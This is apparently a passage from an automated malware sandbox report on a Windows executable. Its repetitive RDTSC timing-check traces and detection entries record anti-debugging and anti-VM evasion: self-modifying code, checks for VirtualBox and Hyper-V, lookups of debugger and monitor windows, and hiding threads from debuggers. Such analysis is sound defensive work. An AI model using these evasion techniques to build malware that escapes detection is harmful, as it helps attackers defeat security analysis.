Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01309 second address: C01311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0145E second address: C0147C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B566h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015B5 second address: C015B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015B9 second address: C015BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015BD second address: C015C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015C3 second address: C015DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F35AD45B565h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015DE second address: C0160B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jc 00007F35AD0C7236h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F35AD0C7247h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0160B second address: C0161D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B55Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0161D second address: C01623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01A05 second address: C01A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01A09 second address: C01A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F35AD0C723Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01B6E second address: C01B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F35AD45B556h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01B7A second address: C01BBF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F35AD0C7236h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 pushad 0x0000001a jne 00007F35AD0C7236h 0x00000020 jmp 00007F35AD0C7248h 0x00000025 push esi 0x00000026 pop esi 0x00000027 je 00007F35AD0C7236h 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01BBF second address: C01BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01D75 second address: C01D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01D7E second address: C01D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01D82 second address: C01D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7247h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02C9F second address: C02CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F35AD45B568h 0x0000000f jmp 00007F35AD45B563h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02CD4 second address: C02CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02CD8 second address: C02CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02CE0 second address: C02D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C723Ah 0x00000007 push edx 0x00000008 jnp 00007F35AD0C7236h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007F35AD0C723Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02D08 second address: C02D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0947C second address: C09480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C09480 second address: C0948C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F35AD45B556h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0948C second address: C09496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08E2F second address: C08E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F35AD45B558h 0x0000000b pushad 0x0000000c jc 00007F35AD45B556h 0x00000012 jmp 00007F35AD45B566h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08E5B second address: C08E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F35AD0C7236h 0x0000000a popad 0x0000000b popad 0x0000000c jng 00007F35AD0C7242h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C090D2 second address: C090D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C090D8 second address: C090EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F35AD0C7236h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F35AD0C7236h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C090EB second address: C09108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B569h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C09108 second address: C09113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C09113 second address: C0911F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F35AD45B556h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C185CA second address: C185D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C185D4 second address: C185DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F35AD45B556h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18058 second address: C1805E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18196 second address: C181B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD45B566h 0x00000009 js 00007F35AD45B556h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19FFC second address: C1A000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A000 second address: C1A01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F35AD45B55Ch 0x0000000c jmp 00007F35AD45B55Bh 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1BAC1 second address: C1BAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1BAC9 second address: C1BACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FDB8 second address: C1FDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007F35AD0C7238h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F35AD0C723Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FDD4 second address: C1FDD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2803B second address: C2803F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2803F second address: C28049 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F35AD45B556h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2FB5D second address: C2FB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C723Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2FB6D second address: C2FB73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2FB73 second address: C2FB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2E554 second address: C2E558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2EC43 second address: C2EC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2ED9A second address: C2EDA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C323A5 second address: C323A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C323A9 second address: C323B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C323B1 second address: C323BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C323BB second address: C323BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3559F second address: C355B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C723Dh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C506F5 second address: C50701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F35AD45B556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53759 second address: C5377C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7241h 0x00000007 js 00007F35AD0C7236h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5377C second address: C53797 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F35AD45B556h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F35AD45B556h 0x00000015 ja 00007F35AD45B556h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53797 second address: C537A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F35AD0C723Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55224 second address: C5522E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F35AD45B556h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55049 second address: C5504D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5504D second address: C55062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B561h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55062 second address: C55068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55068 second address: C5506C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A83F second address: C6A86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007F35AD0C7241h 0x0000000c jo 00007F35AD0C723Ch 0x00000012 jns 00007F35AD0C7236h 0x00000018 push eax 0x00000019 push edx 0x0000001a jc 00007F35AD0C7236h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AB4D second address: C6AB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F35AD45B556h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AB5C second address: C6AB60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AB60 second address: C6AB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B22E second address: C6B232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E46E second address: C6E472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E472 second address: C6E47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E47C second address: C6E480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E480 second address: C6E4F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F35AD0C7238h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 or dword ptr [ebp+122D1F1Ah], eax 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F35AD0C7238h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 pushad 0x00000045 add dword ptr [ebp+12457107h], ecx 0x0000004b mov ecx, dword ptr [ebp+122D3630h] 0x00000051 popad 0x00000052 push A2100F69h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F35AD0C723Ah 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E4F3 second address: C6E4F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E7BE second address: C6E7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E7C3 second address: C6E7CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F35AD45B556h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E7CD second address: C6E841 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1BB9h], ebx 0x00000013 mov dx, si 0x00000016 push dword ptr [ebp+122D2ECFh] 0x0000001c jmp 00007F35AD0C723Fh 0x00000021 call 00007F35AD0C7239h 0x00000026 push esi 0x00000027 jmp 00007F35AD0C7249h 0x0000002c pop esi 0x0000002d push eax 0x0000002e pushad 0x0000002f ja 00007F35AD0C7238h 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 jmp 00007F35AD0C723Ch 0x0000003c popad 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jno 00007F35AD0C7238h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E841 second address: C6E859 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F35AD45B558h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F35AD45B558h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E859 second address: C6E86D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F35AD0C7236h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F925 second address: C6F92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F92B second address: C6F92F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F92F second address: C6F937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F937 second address: C6F94C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F35AD0C7240h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F94C second address: C6F952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70F7E second address: C70F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9DC7C3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9DA6AA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B986BD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C0B7DF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7788Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000003.00000003.1330974839.0000000001497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1330974839.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.0000000001497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: file.exe, 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009BDF70 LdrInitializeThunk,3_2_009BDF70
Source: file.exe, file.exe, 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WNProgram Manager
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

